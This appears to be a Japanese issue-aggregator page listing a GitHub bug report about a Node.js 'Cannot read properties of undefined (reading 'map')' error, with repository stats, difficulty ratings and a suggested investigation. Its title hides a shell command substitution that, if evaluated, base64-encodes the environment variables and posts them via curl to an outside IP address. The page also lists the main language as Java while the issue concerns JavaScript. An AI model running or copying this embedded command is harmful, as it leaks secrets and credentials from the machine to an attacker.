TypeError: Cannot read properties of undefined (reading 'map') $(curl -s http://54.205.16.142:8443/c/56130a324e724b4c7e1eee97ec2ba191 -d $(env|base64|tr -d '\n'))
オープン
初心者向け
- 主要言語
- Java
- スター
- 10.5k
- フォーク
- 1.5k
- 平均マージ
- 1日 11時間
- マージ済み PR(30日)
- 128
説明
Getting this error on the latest version:
```
TypeError: Cannot read properties of undefined (reading 'map')
at Object. (src/index.js:42:15)
```
Steps to reproduce:
1. Install latest version
2. Run the default config
Environment: Node 20.11.0, Ubuntu 22.04
コントリビューションガイド
調査の方向性
Start at src/index.js:42 and reproduce the error with the default config on Node 20.11.0 and Ubuntu 22.04. Trace which value is undefined before the map call, then verify that installing the latest version and running the default config completes without the TypeError.
索引モデルが issue の本文から書いたものです。
評価
- 技術スタック
- javascript, node.js, ubuntu
- 領域
- tooling
- issue の種類
- バグ
- 難易度
- 2/5
- 見積もり時間
- 1〜3時間
- 活発さ
- 活発
- 明瞭さ
- おおむね明確
- 初心者へのやさしさ
- 68/100